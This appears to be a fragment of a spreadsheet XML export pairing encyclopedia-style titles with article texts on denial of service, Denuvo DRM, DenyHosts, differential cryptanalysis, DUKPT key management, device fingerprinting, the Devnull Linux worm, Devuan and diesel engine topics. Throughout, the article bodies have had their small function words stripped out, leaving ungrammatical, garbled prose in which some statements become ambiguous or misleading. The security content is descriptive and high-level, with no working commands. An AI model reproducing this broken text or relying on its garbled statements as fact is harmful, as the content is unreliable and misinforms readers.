occur system ends denied, deliberate attack single individual group individuals, simply sudden enormous spike popularity. this happen extremely popular website posts prominent link second, less well-prepared site, example, part news story. result significant proportion primary site's regular users potentially hundreds thousands people click link space hours, effect target website ddos attack. vipdos same, specifically link posted celebrity. when michael jackson died 2009, websites google twitter slowed even crashed. many sites' servers thought requests virus spyware trying cause denial-of-service attack, warning users queries looked like "automated requests computer virus spyware application".news sites link sites sites whose primary function provide links interesting content elsewhere internet likely cause phenomenon. canonical example slashdot effect receiving traffic slashdot. also known "the reddit death" "the digg effect". routers also known create unintentional attacks, d-link netgear routers overloaded servers flooding without respect</t>
  </si>
  <si>
    <t>Denuvo</t>
  </si>
  <si>
    <t>denuvo anti-tamper anti-tamper technology digital rights management (drm) scheme developed austrian software company denuvo software solutions gmbh, subsidiary irdeto. company also developed anti-cheat counterpart. history denuvo developed denuvo software solutions gmbh, software company based salzburg, austria. company formed management buyout digitalworks, sony digital audio disc corporation developed securom technology. originally employed people. january 2018, company acquired larger software company irdeto. development denuvo software started 2014. fifa released september 2014, first game denuvo.3dm, chinese warez group, first claimed breached denuvo's technology blog post published december 2014, wherein announced would release cracked versions denuvo-protected games fifa dragon age: inquisition lords fallen. following onto this, released version dragon age: inquisition weeks game shipped. overall cracking progress took month, unusually long time game cracking scene. when asked development, denuvo software solutions acknowledged "every protected game eventually gets cracked". however, technology website technica noted sales major games happen within days release, publishers consider denuvo success meant game took significantly longer cracked. january 2016, 3dm's founder, bird sister, revealed give trying break denuvo implementation just cause warned that, ongoing trend implementation, would free games play world" near future. subsequently, opted crack games year examine whether move would influence game sales. denuvo's marketing director, thomas goebl, claimed console-exclusive games releases technology.by october 2017, crackers able bypass denuvo's protection within hours game's release, notable examples south park: fractured whole, middle-earth: shadow war, total war: warhammer fifa cracked release dates. another notable case, assassin's creed origins, wrapped denuvo within security tool vmprotect well ubisoft's proprietary used uplay distribution software, security features bypassed italian collective february 2018, three months game's release. december 2018, hitman protection bypassed three days official release date exclusive pre-order access, drawing comparisons final fantasy protection removed four days release.by 2019, several products like devil metro exodus, resident evil dawn, football manager 2019 soul calibur cracked within first week release, combat taking thirteen days. case rage released steam well bethesda softworks' bethesda launcher, steam version protected denuvo, whereas bethesda launcher version not, leading game cracked immediately, denuvo removed steam release days later.a sister product, denuvo anti-cheat, announced march 2019, first used doom eternal following patch 2020. however, less week later doom developer software announced would removing game following negative response players. technology games protected denuvo require online activation. according empress, notable denuvo cracker, software assigns unique authentication token copy game, depending factors like user's hardware. integrated game's code, makes especially hard circumvent. criticism denuvo criticised high central processing unit (cpu) usage excessive writing operations storage components, latter causing significant life-span reductions solid-state drives (ssds). denuvo software solutions denied claims. case tekken sonic mania plus, denuvo caused significant decrease performance several parts games. machkovech technica reviewed in-depth denuvo causing performance penalties, releasing article matter december 2018. december 2018, joel hruska extremetech compared performance multiple games denuvo enabled disabled, found games tested significantly higher frame rates lower loading times denuvo used. richard leadbetter digital foundry compared performance pirated version resident evil village stripped denuvo capcom's additional copy protection release version windows, found drm-stripped version performed better released game. confirmed stuttering caused capcom's denuvo.in july 2018, denuvo software solutions filed lawsuit voksi, 21-year-old bulgarian hacker cracked several denuvo-protected games. voksi arrested bulgarian authorities, website, revolt, taken offline.in 2020, kaspersky anti-virus detected removed denuvo anti-cheat implementation doom eternal malware, possibly kernel-level access.in november 2021, outrage occurred many recent games rendered unplayable denuvo owned domain name expiring. month discovered many denuvo games would work intel 12th alder lake cpus either windows windows however, january 2022, alder lake incompatibility issue addressed, bringing list incompatible titles zero. references external links official website</t>
  </si>
  <si>
    <t>DenyHosts</t>
  </si>
  <si>
    <t>denyhosts log-based intrusion-prevention security tool servers written python. intended prevent brute-force attacks servers monitoring invalid login attempts authentication blocking originating addresses. denyhosts developed phil schwartz, also developer kodos python regular expression debugger. operation denyhosts checks authentication recent failed login attempts. records information originating addresses compares number invalid attempts user-specified threshold. many invalid attempts assumes dictionary attack occurring prevents address making attempts adding /etc/hosts.deny server. denyhosts support centralized synchronization, repeat offenders blocked many computers. site denyhosts.net gathers statistics computers running software. denyhosts restricted connections using ipv4. work ipv6. denyhosts manually, daemon, cron job. discoveries july 2007, register reported july year, "compromised computers" oracle listed among worst offenders launching brute force attacks internet, according public denyhosts listings. after investigation, oracle denied suggestions computers compromised. vulnerabilities daniel wrote paper showing denyhosts, well similar programs fail2ban blockhosts, vulnerable remote injection, attack technique similar injection, specially crafted user name used trigger block site chosen attacker. this fixed version 2.6. forks descendants since development original author phil schwartz release version (december 2006) claimed version (november 2008) actual downloadable package available, development first continued february 2012 matt ruffalo github repository. independent separate fork started almost-identically named denyhost sourceforge project site release different version 2014. after version 2.9, sourceforge project merged earlier github repository, newer versions available means. software runs centralized synchronization server denyhosts versions use, never released. independent synchronization server software developed jan-pascal best since june 2015. also fail2ban, similar program prevents brute force attacks services ossec wrapper references general references external links official website blue page installing denyhost</t>
  </si>
  <si>
    <t>Differential cryptanalysis</t>
  </si>
  <si>
    <t>differential cryptanalysis general form cryptanalysis applicable primarily block ciphers, also stream ciphers cryptographic hash functions. broadest sense, study differences information input affect resultant difference output. case block cipher, refers techniques tracing differences network transformation, discovering cipher exhibits non-random behavior, exploiting properties recover secret (cryptography key). history discovery differential cryptanalysis generally attributed biham shamir late 1980s, published number attacks various block ciphers hash functions, including theoretical weakness data encryption standard (des). noted biham shamir surprisingly resistant differential cryptanalysis small modifications algorithm would make much susceptible.in 1994, member original team, coppersmith, published paper stating differential cryptanalysis known early 1974, defending differential cryptanalysis design goal. according author steven levy, discovered differential cryptanalysis own, apparently well aware technique. kept secrets, coppersmith explains: "after discussions nsa, decided disclosure design considerations would reveal technique differential cryptanalysis, powerful technique could used many ciphers. this turn would weaken competitive advantage united states enjoyed countries field cryptography." within ibm, differential cryptanalysis known "t-attack" "tickle attack".while designed resistance differential cryptanalysis mind, contemporary ciphers proved vulnerable. early target attack feal block cipher. original proposed version four rounds (feal-4) broken using eight chosen plaintexts, even 31-round version feal susceptible attack. contrast, scheme successfully cryptanalyze effort order chosen plaintexts. attack mechanics differential cryptanalysis usually chosen plaintext attack, meaning attacker must able obtain ciphertexts plaintexts choosing. there are, however, extensions would allow known plaintext even ciphertext-only attack. basic method uses pairs plaintext related constant difference. difference defined several ways, exclusive (xor) operation usual. attacker computes differences corresponding ciphertexts, hoping detect statistical patterns distribution. resulting pair differences called differential. their statistical properties depend upon nature s-boxes used encryption, attacker analyses differentials {\displaystyle (\delta _{x},\delta _{y})} (and denotes exclusive s-box basic attack, particular ciphertext difference expected especially frequent. way, cipher distinguished random. more sophisticated variations allow recovered faster exhaustive search. basic form recovery differential cryptanalysis, attacker requests ciphertexts large number plaintext pairs, assumes differential holds least rounds, total number rounds. attacker deduces round keys (for final round) possible, assuming difference blocks final round fixed. when round keys short, achieved simply exhaustively decrypting ciphertext pairs round possible round key. when round deemed potential round considerably often key, assumed correct round key. particular cipher, input difference must carefully selected attack successful. analysis algorithm's internals undertaken; standard method trace path highly probable differences various stages encryption, termed differential characteristic. since differential cryptanalysis became public knowledge, become basic concern cipher designers. designs expected accompanied evidence algorithm resistant attack, many, including advanced encryption standard, proven secure attack. attack detail attack relies primarily fact given input/output difference pattern occurs certain values inputs. usually attack applied essence non-linear components solid component (usually fact look-up tables s-boxes). observing desired output difference (between chosen known plaintext inputs) suggests possible values. example, differential (implying difference least significant (lsb) input leads output difference lsb) occurs probability 4/256 (possible non-linear function cipher instance) values pairs) inputs differential possible. suppose non-linear function xor'ed evaluation values allow differential {2,3} {4,5}. attacker sends values observes correct output difference means either meaning either essence, n-bit non-linear function would ideally seek close 2−(n possible achieve differential uniformity. when happens, differential attack requires much work determine simply brute forcing key. non-linear function maximum differential probability 4/256 (most entries however either meaning theory could determine half much work brute force, however, high branch prevents high probability trails existing multiple rounds. fact, cipher would immune differential linear attacks much weaker non-linear function. incredibly high branch (active s-box count) means rounds attack involves fewer non-linear transforms, meaning probability success exceed pr[attack] pr[best attack s-box]50. example, current s-box emits fixed differential probability higher (4/256)50 2−300 lower required threshold 2−128 128-bit block cipher. this would allowed room efficient s-box, even 16-uniform probability attack would still 2−200. there exist bijections even sized inputs/outputs 2-uniformity. they exist fields (such gf(27)) using either cubing inversion (there exponents used well). instance s(x) binary field immune differential linear cryptanalysis. this part misty designs 9-bit functions 16-bit non-linear function. what functions gain immunity differential linear attacks lose algebraic attacks. that possible describe solve solver. this part (for instance) affine mapping inversion. specialized types higher-order differential cryptanalysis truncated differential cryptanalysis impossible differential cryptanalysis boomerang attack also cryptography integral cryptanalysis linear cryptanalysis differential equations addition references general</t>
  </si>
  <si>
    <t>Departmental boot image</t>
  </si>
  <si>
    <t>departmental boot image boot image computer enhanced adding applications passwords specific task group department organization. this many advantages thin client strategy, done operating system base long boot device large enough accommodate boot applications together. typical departmental windows boot image usually large requires store, large network booting. accordingly, usually installed fixed removable hard drive kept inside machine, rather installed network rom. there boot image control complexity total cost operations advantages using departmental boot image instead common boot image entire organization, thin client: capabilities full operating system available, thin client applications inflexible software licenses need paid entire organization, paid departments actually installed machines applications interact badly segmented accounting program engineering program "clobber other's libraries" otherwise interfere would sets applications installed boot image overall size boot image controlled within network removable disk limitsdisadvantages include complexity creating managing several large boot images, determining department needs upgrade applications. user allowed own, then, discipline soon degrades shop easier manage consists one-off computers quirks, frequently requiring re-imaging whose issues really diagnosable comparable other. some experts believe departmental boot image regime degrades rather quickly state without extraordinary discipline controls, advocate thin clients ensure control. however increasingly possible restrict users installing "their own" applications standard boot image, automatically re-install variant boot image detected. while would draconian large organization boot image often quite acceptable boot image maintained departmental level users request upgraded minimum bureaucracy waiting.</t>
  </si>
  <si>
    <t>Derived unique key per transaction</t>
  </si>
  <si>
    <t>cryptography, derived unique transaction (dukpt) management scheme every transaction, unique used derived fixed key. therefore, derived compromised, future past transaction data still protected since next prior keys cannot determined easily. dukpt specified ansi x9.24 part overview dukpt allows processing encryption moved away devices hold shared secret. encryption done derived key, re-used transaction. dukpt used encrypt electronic commerce transactions. while used protect information companies banks, typically used encrypt information acquired point-of-sale (pos) devices. dukpt encryption standard; rather management technique. features dukpt scheme are: enable originating receiving parties agreement used given transaction, transaction distinct transactions, except coincidence, present derived compromised, past future keys (and thus transactional data encrypted them) remain uncompromised, device generates different sequence, originators receivers encrypted messages perform interactive key-agreement protocol beforehand. history dukpt invented late 1980s visa didn’t receive much acceptance 1990s, industry practices shifted towards recommending, later requiring, device distinct encryption key. before dukpt, state known master/session, required every pin-encrypting device initialized unique master key. handling transactions originating devices using master/session management, unwanted side effect need table encryption keys numerous devices deployed. major merchant acquirer table could become quite large indeed. dukpt resolved this. dukpt device still initialized distinct key, initialization keys entire family devices derived single key, base derivation (bdk). decrypt encrypted messages devices field, recipient need store bdk. keys stated above, algorithm needs initial single original description algorithm called super-secret key, later renamed to—in official-sounding way—base derivation bdk). original name perhaps conveys better true nature key, compromised devices transactions similarly compromised. this mitigated fact parties know bdk: recipient encrypted messages (typically merchant acquirer) party initializes encryption devices (typically manufacturer device).the usually stored inside tamper-resistant security module (trsm), hardware security module (hsm). must remain clear used initialize encryption device participate dukpt operations. actual encryption generation process. first: derived bdk, known ipek (initial encryption key) second: ipek injected devices, compromise compromises device, bdk. this creates another keys (inside device) irreversibly derived (nominally called future keys) fourth: afterwards ipek immediately discarded. note: this step contradicts "session keys" section indicates "future keys" generated. ipek must retained terminal order generate next batch future keys. fifth: future keys used encrypt transactions dukpt process.upon detection compromise device derives derived generation process. communication origination originating (encrypting) end, system works follows: transaction initiated involves data encrypted. typical case customer's pin. retrieved “future keys” this used encrypt message, creating cryptogram. identifier known “key serial number” (ksn) returned encrypting device, along cryptogram. formed device’s unique identifier, internal transaction counter. (cryptogram, ksn) pair forwarded intended recipient, typically merchant acquirer, decrypted processed further. internally, device following: increments transaction count (using internal counter) invalidates used, necessary generates future keys receiving receiving (decrypting) end, system works follows: (cryptogram, ksn) pair received. appropriate system one) located. receiving system first regenerates ipek, goes process similar used originating system arrive encrypting used (the session key). serial number (ksn) provides information needed this. cryptogram decrypted session key. processing done. merchant acquirers, usually means encrypting another forward switch (doing “translate”), certain closed-loop operations involve directly processing data, verifying pin. session keys method arriving session keys somewhat different originating side receiving side. originating side, considerable state information retained transactions, including transaction counter, serial number, array “future keys”. receiving side state information retained; persistent across processing operations. this arrangement provides convenience receiver large number devices serviced storing key). also provides additional security respect originator (pin capture devices often deployed security-averse environments; security parameters devices ‘distant’ sensitive bdk, device compromised, devices implicitly compromised). registers usage backup registers following storage areas relating management maintained time "load initial key" command life entry device: encryption counter bits) counter number encryptions occurred since entry device first initialized. certain counter values skipped explained below), million encryption operations possible. note: concatenation (left right) initial serial number register encryption counter form 80-bit hexadecimal digits) serial number register. future registers registers hexadecimal digits each) registers, numbered #21, used store future encryption keys. each register includes hexadecimal digit longitudinal redundancy check (lrc) hexadecimal digit cyclical redundancy check (crc). temporary registers following storage areas relating management required temporary basis used purposes processing routines: current pointer (approximately hexadecimal digits) contains address future register whose contents used current cryptographic operation. identifies contents future register whose address contained current pointer. shift register bits) 21-bit register, whose bits numbered left right #21. this register normally contains "zero" bits single "one" bit. register select future registers. future register selected numbered identically shift register containing single "one". crypto register-1 hexadecimal digits) register used performing cryptographic operations. crypto register-2 hexadecimal digits) second register used performing cryptographic operations. register hexadecimal digits) register used hold cryptographic key. practical matters (ksn scheme) practical applications, would several bdks record, possibly different customers, contain scope compromise. when processing transactions, important receiver know used initialize originating device. achieve this, 80-bit structured three parts: trsm transaction counter. algorithm specifies transaction counter 21-bits, treats remaining bits opaquely (the algorithm specifies unused bits 0-padded nibble boundary, padded 80-bit boundary). because this, entity managing creation dukpt devices (typically merchant acquirer) free subdivide bits according preference. industry practice designate partitioning series three digits, indicating number digits used part: trsm transaction counter. common choice '6-5-5', meaning first digits indicate (i.e., used), next trsm (i.e. device serial number within range initialized common bdk), last transaction counter. this notational scheme strictly accurate, transaction counter bits, even multiple (the number bits digit). consequently, transaction counter actually consumes field trsm example means trsm field accommodate 2(5*4-1) devices, instead 2(5*4), half million). also, common practice industry 64-bits (probably reasons pertinent legacy systems, encryption), would imply full padded left four digits. remaining digits (16-bits) available, nonetheless, systems accommodate them. 6-5-5 scheme mentioned would permit million bdks, 500,000 devices bdk, million transactions device.</t>
  </si>
  <si>
    <t>Device Keys</t>
  </si>
  <si>
    <t>device keys play role cryptographic management procedure advanced access content system (aacs) specification. this specification defines method protecting audiovisual entertainment content, including high-definition content. introduction aacs’s cryptographic management procedure uses device keys decrypt elements media block (mkb), order extract secret media (km). located physical support (the disc) together content disc encrypted. enables system renewability. generated aacs allows compliant devices, using secret device keys, calculate media (km). device keys compromised threatens integrity system, updated released causes device compromised device keys unable calculate correct way, compromised device keys “revoked” mkb. works each compliant device given secret device keys manufactured. actual number keys different different media types. these device keys, referred (i=0,1,…,n-1), provided aacs device keys either unique device, used commonly multiple devices. device shall treat device keys highly confidential. encrypted subset difference tree approach. order decrypt device must know right processing available subset-difference tree process.essentially, device keys arranged tree given device used find lower level processing keys. processing keys higher position tree given device keys reachable.a given device keys give access given processing keys, given decodable mkb. this way, revoke given device key, needs encrypted processing reachable device keys set. storing each device given device keys 31-bit number called device number. device key, associated number denoted path number, mask, mask. path number denotes position tree associated device key. this path number defines path root node tree.the masks used subset difference tree process. they always single sequence 1-bits followed single sequence 0-bits. masks indicate “don’t care” bits path number; mask, corresponding path number “don’t care”. deeper position node tree, shorter sequence 0-bits mask associated node. device number, path number, masks denote nodes within binary tree. sources introduction common cryptographic elements 0.91 aacs technical overview 7/2004 also history attacks advanced access content system aacs encryption controversy external links aacs page guide understand aacs</t>
  </si>
  <si>
    <t>Device configuration overlay</t>
  </si>
  <si>
    <t>device configuration overlay (dco) hidden area many today's hard disk drives (hdds). usually information stored either host protected area (hpa), accessible bios uefi), user. however, certain tools used modify dco. system uses identify_­device command determine supported features given hard drive, report command supported features nonexistent drive smaller actually determine actual size features disk, device_­configuration_­identify command used, output command compared output identify_­device present given hard drive. most major tools remove order fully image hard drive, using device_­configuration_­reset command. this permanently alters disk, unlike host protected area (hpa), temporarily removed power cycle. uses device configuration overlay (dco), first introduced ata-6 standard, "allows system vendors purchase hdds different manufacturers potentially different sizes, configure hdds number sectors. example would using make 80-gigabyte appear 60-gigabyte (os) bios.... given potential place data hidden areas, area concern computer forensics investigators. additional issue forensic investigators imaging and/or while certain vendors claim tools able properly detect image hpa, either silent handling indicate beyond capabilities tool." software tools detection tools hdat2 free software program ms-dos. used create/remove host protected area (hpa) (using command max) create/remove hidden area (using command modify). also functions dco. data synergy's freeware atatool utility used detect windows environment. recent versions allow created, removed frozen.victoria 5.xx freeware hdd/ssd test, repair benchmark utility allows work windows environment. there full range options working dco: getting structure, editing applying changes. software imaging tools guidance software's encase comes linux-based tool images hard drives called linen. linen 6.01 validated national institute justice (nij) october 2008, found "the tool remove either host protected areas (hpas) dcos. however, linux test environment automatically removed test drive, allowing tool image sectors hidden hpa. tool acquire sectors hidden dco."accessdata's imager 2.5.3.14 validated national institute justice (nij) june 2008. their findings indicated physical acquisition made drive hidden sectors either host protected area device configuration overlay, tool remove either dco. tool acquire sectors hidden hpa." hardware imaging tools variety hardware imaging tools found successfully detect remove dcos. routinely tests digital forensics tools publications found www.ojp.gov (link needs checking wikipedians! particular european reader using locked-down non-javascript firefox 2021-11-30 link unhelpfully shows: "access denied. authorized access page") nist https://www.nist.gov/itl/ssd/software-quality-group/computer-forensics-tool-testing-program-cftt also host protected area (hpa) master boot record (mbr) guid partition table (gpt) references</t>
  </si>
  <si>
    <t>Device fingerprint</t>
  </si>
  <si>
    <t>device fingerprint machine fingerprint information collected software hardware remote computing device purpose identification. information usually assimilated brief identifier using fingerprinting algorithm. browser fingerprint information collected specifically interaction browser device.: device fingerprints used fully partially identify individual devices even persistent cookies (and zombie cookies) cannot read stored browser, client address hidden, switches another browser device. this allow service provider detect prevent identity theft credit card fraud,: also compile long-term records individuals' browsing histories (and deliver targeted advertising: targeted exploits: even attempting avoid tracking raising major concern internet privacy advocates. history basic browser configuration information long collected analytics services effort measure real human traffic discount various forms click fraud. since introduction late 1990s, client-side scripting gradually enabled collection increasing amount diverse information, computer security experts starting complain ease bulk parameter extraction offered browsers early 2003.in 2005, researchers university california, diego showed timestamps could used estimate clock skew device, consequently remotely obtain hardware fingerprint device.in 2010, electronic frontier foundation launched website visitors test browser fingerprint. after collecting sample 470161 fingerprints, measured least 18.1 bits entropy possible browser fingerprinting, advancements canvas fingerprinting, claims another bits. 2012, keaton mowery hovav shacham, researchers university california, diego, showed html5 canvas element could used create digital fingerprints browsers.in 2013, least 0.4% alexa 10,000 sites found fingerprinting scripts provided known third parties.: 2014, 5.5% alexa 10,000 sites found canvas fingerprinting scripts served total domains. overwhelming majority (95%) scripts served addthis, started using canvas fingerprinting january year, without knowledge clients.: 2015, feature protect browser fingerprinting introduced firefox version since left experimental stage, initiated default. year feature named enhanced tracking protection introduced firefox version protect tracking private browsing blocking scripts third party domains found lists published disconnect mobile. wwdc 2018 apple announced safari macos mojave "presents simplified system information users browse web, preventing tracked based system configuration." 2018 study revealed one-third browser fingerprints french database unique, indicating browser fingerprinting become less effective number users increases technologies convergently evolve implement fewer distinguishing features.in 2019, starting firefox version enhanced tracking protection turned default users also non-private browsing. feature first introduced protect private browsing 2015 extended standard browsing opt-in feature 2018. diversity stability motivation device fingerprint concept stems forensic value human fingerprints. order uniquely distinguish time devices fingerprints, fingerprints must sufficiently diverse sufficiently stable. practice neither diversity stability fully attainable, improving tendency adversely impact other. example, assimilation additional browser setting browser fingerprint would usually increase diversity, would also reduce stability, user changes setting, browser fingerprint would change well.: certain degree instability compensated linking together fingerprints that, although partially different, might probably belong device. this accomplished simple rule-based linking algorithm (which, example, links together fingerprints differ browser version, increases time) machine learning algorithms.entropy several ways measure diversity. sources identifying information applications locally installed device allowed gather great amount information software hardware device, often including unique identifiers address serial numbers assigned machine hardware. indeed, programs employ digital rights management information purpose uniquely identifying device. even designed gather share identifying information, local applications might unwillingly expose identifying information remote parties interact. prominent example browsers, proved expose diverse stable information amount allow remote identification, browser fingerprint. diverse stable information also gathered application layer, leveraging protocols used transmit data. sorted model layer, examples protocols are: layer smb, ftp, http, telnet, tls/ssl, dhcp layer snmp, netbios layer (see tcp/ip stack fingerprinting) layer ipv4, ipv6, icmp, ieee 802.11 layer cdppassive fingerprinting techniques merely require fingerprinter observe traffic originated target device, active fingerprinting techniques require fingerprinter initiate connections target device. techniques require interact target device connection initiated latter sometimes addressed semi-passive. browser fingerprint collection large amount diverse stable information browsers possible thanks part client-side scripting languages, introduced late '90s. today several open-source browser fingerprinting libraries, fingerprintjs, imprintjs, clientjs, fingerprintjs updated supersedes imprintjs clientjs large extent. browser version browsers provide name version, together compatibility information, user-agent request header. being statement freely given client, trusted assessing identity. instead, type version browser inferred observation quirks behavior: example, order number http header fields unique browser family: and, importantly, browser family version differs implementation html5,: css: javascript.: 547,549-50 such differences remotely tested using javascript. hamming distance comparison parser behaviors shown effectively fingerprint differentiate majority browser versions.: browser extensions browser unique combination extensions plugins added fingerprint directly.: extensions also modify browser attributes behave, adding additional complexity user's fingerprint.: 1131 adobe flash java plugins widely used access user information deprecation.: hardware properties user agents provide system hardware information, phone model, http header.: properties user's operating system, screen size, screen orientation, display aspect ratio also retrieved observing javascript result media queries.: 59-60 browsing history fingerprinter could determine sites browser previously visited within list provided, querying list using javascript selector :visited.: typically, list popular websites sufficient generate unique user history profile, well provide information user's interests.: 7,14 however, browsers since mitigated risk. font metrics letter bounding boxes differ browsers based anti-aliasing font hinting configuration measured javascript.: canvas webgl canvas fingerprinting uses html5 canvas element, used webgl render graphics browser, gain identifying information installed graphics driver, graphics card, graphics processing unit (gpu). canvas-based techniques also used identify installed fonts.: furthermore, user gpu, information provided fingerprinter instead. canvas fingerprinting script first draws text specified font, size, background color. image text rendered user's browser recovered todataurl canvas method. hashed text-encoded data becomes user's fingerprint.: 2-3,6 canvas fingerprinting methods shown produce bits entropy. because technique obtains information user's gpu, information entropy gained "orthogonal" entropy previous browser fingerprint techniques screen resolution javascript capabilities. hardware benchmarking benchmark tests used determine whether user's utilizes aes-ni intel turbo boost comparing time used execute various simple cryptographic algorithms.: specialized apis also used, battery api, constructs short-term fingerprint based actual battery state device,: oscillatornode, invoked produce waveform based user entropy.: 1399 device's hardware cryptographic hash function specified device's vendor, also queried construct fingerprint.: 109,114 mitigation methods browser fingerprinting different approaches exist mitigate effects browser fingerprinting improve users' privacy preventing unwanted tracking, ultimate approach prevent fingerprinting keeping richness modern browser. offering simplified fingerprint users attempt reduce fingerprintability selecting browser minimizes availability identifying information browser fonts, device canvas element rendering, webgl information, local address.: 2017 microsoft edge considered fingerprintable browser, followed firefox google chrome, internet explorer, safari.: among mobile browsers, google chrome opera mini fingerprintable, followed mobile firefox, mobile edge, mobile safari.: browser disables fingerprintable features canvas webgl notify users fingerprint attempts. offering spoofed fingerprint spoofing information exposed fingerprinter (e.g. user agent) allow reduce diversity,: contrary could also achieved mismatch spoofed information real browser information differentiates user others strategy.: spoofing information differently site visit, example perturbating sound canvas rendering small amount random noise, allows reduce stability.: 820,823 this technique adopted brave browser 2020. blocking scripts blindly blocking client-side scripts served third-party domains, possibly also first-party domains (e.g. disabling javascript using noscript) sometimes render websites unusable. preferred approach block third-party domains seem track people, either they're found blacklist tracking domains (the approach followed blockers) intention tracking inferred past observations (the approach followed privacy badger). using multiple browsers different browsers machine would usually different fingerprints, browsers protected fingerprinting, fingerprints could identified originating machine. also anonymous browsing browser security browser sniffing evercookie fingerprint (computing) internet privacy tracking references further reading fietkau, julian (2020-12-28). "the elephant background: empowering users against browser fingerprinting". chaos communication congress 2020. angwin, julia; valentino-devries, jennifer (2010-11-30). "race 'fingerprint' phones, pcs". wall street journal. issn 0099-9660. retrieved 2018-07-10. segal, ory; fridman, aharon; shuster, elad (2017-06-05). "passive fingerprinting http/2 clients" (pdf). blackhat. retrieved 2022-02-09. external links panopticlick, electronic frontier foundation, gathers elements browser's device fingerprint estimates identifiable makes user unique, inria insa rennes, implements fingerprinting techniques including collecting information webgl.</t>
  </si>
  <si>
    <t>Device tracking software</t>
  </si>
  <si>
    <t>device tracking software software installed electronic device capable reporting device's location remotely. depending upon software device installed, software obtain location device means gps, wifi-location, address, accelerometer logs, report address means e-mail, sms, means. some device tracking software sold part subscription staffed service assist device's owner update police officers device's location. also geolocation software hybrid positioning system mobile phone tracking bringrr skyhook wireless laptop theft prey (software) references</t>
  </si>
  <si>
    <t>Devnull</t>
  </si>
  <si>
    <t>devnull name computer worm linux operating system named /dev/null, unix's null device. this worm found september 2002. this worm, host compromised, downloads executes shell script server. this script downloads gzipped executable file named k.gz address, decompresses runs file. this downloaded file appears client. connects different channels waits commands process infected host. then worm checks presence compiler local system and, found, creates directory called .socket2. next, downloads compressed file called devnull.tgz. after decompressing, files created: binary file called devnull source script file called sslx.c. latter gets compiled binary sslx. executable scan vulnerable hosts compiled program exploit known openssl vulnerability. also linux malware external links f-secure's website: linux/devnull</t>
  </si>
  <si>
    <t>Devuan</t>
  </si>
  <si>
    <t>devuan fork debian uses sysvinit, runit openrc instead systemd. devuan development team maintain compatibility init systems future detach linux unix systems. history release debian alienated developers users project's adoption systemd subsequent removal support existing init systems. first stable release devuan published 2017.instead continuing debian practice using story character names release codenames, devuan aliases releases using planet names. first stable release shared debian codename jessie. however, devuan release named minor planet 10464. second stable release named ascii asteroid/minor planet 3568 based debian stretch. third stable release named beowulf minor planet 38086 based debian buster. fourth release named chimaera minor planet based debian bullseye. permanent alias devuan unstable branch ceres, named dwarf planet.devuan 2.0.0 ascii released june 2018, ascii released november 2019. ascii provides choice five different desktop environments install time (xfce, cinnamon, kde, lxqt, mate), many window managers available repositories. also provides installation options choosing sysvinit openrc init, grub lilo boot loader. devuan maintains modified version debian expert text installer, ability install free software user chooses, live desktop image also uses custom graphical installer refracta, derivative devuan.devuan beowulf released june 2020, based debian 10.4. ppc64el added list supported architectures. runit available alternative init. eudev elogind used replace systemd functionality.devuan chimaera released october 2021. based debian bullseye (11.1) linux kernel 5.10. packages devuan package repository mirrors upstream debian, local modifications made needed allow init systems systemd. modified packages include policykit udisks. devuan supposed work like corresponding debian release. devuan provide systemd repositories still retains libsystemd0 removed dependencies. amprolla program used merge debian packages devuan packages. downloads packages debian merges changes packages devuan overrides. version history source: notes references external links devuan distrowatch devuan home page source code repository release archive</t>
  </si>
  <si>
    <t>Diesel engine runaway</t>
  </si>
  <si>
    <t>diesel engine runaway rare condition affecting diesel engines, engine draws extra fuel unintended source overspeeds higher higher rpm, producing times engine's rated output destroyed mechanical failure bearing seizure lack lubrication. two-stroke hot-bulb engines also away process. causes diesel engine, torque rotational speed controlled means quality torque manipulation. this means that, intake stroke, engine draws mixed fuel; fuel injected cylinder contents compressed compression stroke. high temperature near compression stroke causes spontaneous combustion mixture fuel injected. output torque controlled adjusting mass injected fuel; fuel injected, higher torque produced. adjusting amount fuel received stroke alters quality air-fuel-mixture, adjusting amount mixture required diesel engines throttle valves.diesel engines combust large variety fuels, including many sorts oil, petrol, combustible gasses. this means type leak malfunction increases amount fuel unintentionally entering combustion chamber, quality air-fuel-mixture increase, causing torque rotational speed increase. fuel leaks causing engine runaways internal external causes. broken seals broken turbocharger cause large amounts mist enter inlet manifold, whereas defective injection pumps cause unintentionally large amount fuel injected directly combustion chamber. diesel engine operated environment combustible gasses used, leak result engine runaway enter engine's inlet manifold. stopping runaway engine several ways stop runaway diesel engine block intake, either physically using cover plug, alternatively directing fire extinguisher intake smother engine. engines fitted decompressor also stopped operating decompressor, vehicle manual transmission sometimes possible stop engine engaging high gear (i.e. 4th, 5th, etc.), foot brake parking brake fully applied, quickly letting clutch slow engine stop, without moving vehicle. this last option result catastrophic damage whole transmission, mainly gearbox, operation save engine. notable incidents involving diesel engine runaway texas city refinery explosion, instance diesel engine runaway thought provided ignition source triggered massive explosion. after refinery's blowdown stack failed started releasing raffinate air, pickup truck parked near blowdown stack engine idling engulfed vapor cloud released engine began race. staff refinery attempted stop truck's now-overheating engine, backfired, igniting vapor cloud triggering disaster. references bibliography seifert, bill; william seifert; daniel spurr (2001). offshore sailing: essential passagemaking tips. mcgraw-hill professional. isbn 0-07-137424-8. also limiter external links general electric es44ac locomotive process runaway norfolk southern diesel locomotive runaway</t>
  </si>
  <si>
    <t>Diesel rotary uninterruptible power supply</t>
  </si>
  <si>
    <t>most forms uninterruptible power supply (ups) either powered battery flywheel energy. these ready immediate instant mains electricity fails, relatively small finite amount stored energy contain makes suitable short periods use, typically order dozen minutes couple hours depending actual load. uninterruptible continuous power supply, diesel-generator back-up system needed along fuel supply plan includes on-demand replacement. diesel rotary uninterruptible power supply devices (drups) combine functionality battery-powered flywheel-powered diesel generator. when mains electricity supply within specification, electrical generator mass functions motor store kinetic energy electro-mechanical flywheel. when mains electricity supply fails, stored energy flywheel released drive electrical generator, continues supply power without interruption. time delay, example seconds, prevent diesel engine starting every incident), diesel engine takes flywheel drive electrical generator make electricity required. electro-magnetic flywheel continue support diesel generator order keep stable output frequency. typically drups enough fuel power load days even weeks event failure mains electricity supply. main advantages drups equipment compared battery-powered combined diesel-generator higher overall system energy efficiency, smaller footprint, fewer components, longer technical lifetime power electronics) fact result chemical waste batteries).the main disadvantages drups equipment frequent maintenance regimen number moving parts. drups also typically installed external buildings noise concerns generators. drups provide ride-through time 15–40 seconds. flywheel installed ahead typical battery systems reduce effects lightning switching transients increase battery life. also spot network substation references</t>
  </si>
  <si>
    <t>Dieseling</t>
  </si>
  <si>
